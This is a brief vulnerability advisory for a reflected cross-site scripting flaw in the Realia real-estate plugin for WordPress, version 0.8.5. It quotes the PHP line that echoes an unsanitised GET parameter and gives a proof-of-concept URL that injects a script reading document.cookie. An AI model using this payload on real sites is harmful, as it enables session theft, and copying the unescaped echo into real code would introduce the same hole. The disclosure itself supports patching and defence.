WordPress Realia 0.8.5 Cross Site Scripting

`Exploit Title : wordpress plugin 'Realia' (real estate solution) multiple XSS Vulnerability   
Author : WICS  
Date : 03/06/2016  
Software Link : https://wordpress.org/plugins/realia/  
Tested Version: 0.8.5  
  
  
Overview:  
Realia is wordpress plugin which provides functionality of real estate service like search and sale of property.  
  
this script is having property search form which is vulnerable to Cross Site Scripting attack  
template codes inside directory realia\templates\widgets\filter-fields are to display search form on user end.   
scripts (inside directory realia\templates\widgets\filter-fields) are not encoding user supplied data in GET method variable before printing to search page and  
causing XSS vulnerability.  
for example in id.php, from line number 7 to 9, input text field code is given below  
<input type="text" name="filter-id" class="form-control"  
<?php if ( 'placeholders' == $input_titles ) : ?>placeholder="<?php echo __( 'Property ID', 'realia' ); ?>"<?php endif; ?>  
value="<?php echo ! empty( $_GET['filter-id'] ) ? $_GET['filter-id'] : ''; ?>"  
on line number 9, GET method variable filter-id value is getting pass directly and no XSS filter to clean the data which results in XSS  
  
POC  
http://127.0.0.1/wordpress/properties/?filter-contract=RENT&filter-id="><script>alert(document.cookie);</script>&filter-location=&filter-property-type=&filter-amenity=&filter-status=&filter-contract=&filter-material=&filter-price-from=1337'&filter-price-to=&filter-rooms=&filter-baths=&rent_filter-beds=&filter-year-built=&filter-home-area-from=&filter-home-area-to=&filter-lot-area-from=&filter-lot-area-to=&filter-garages=  
  
`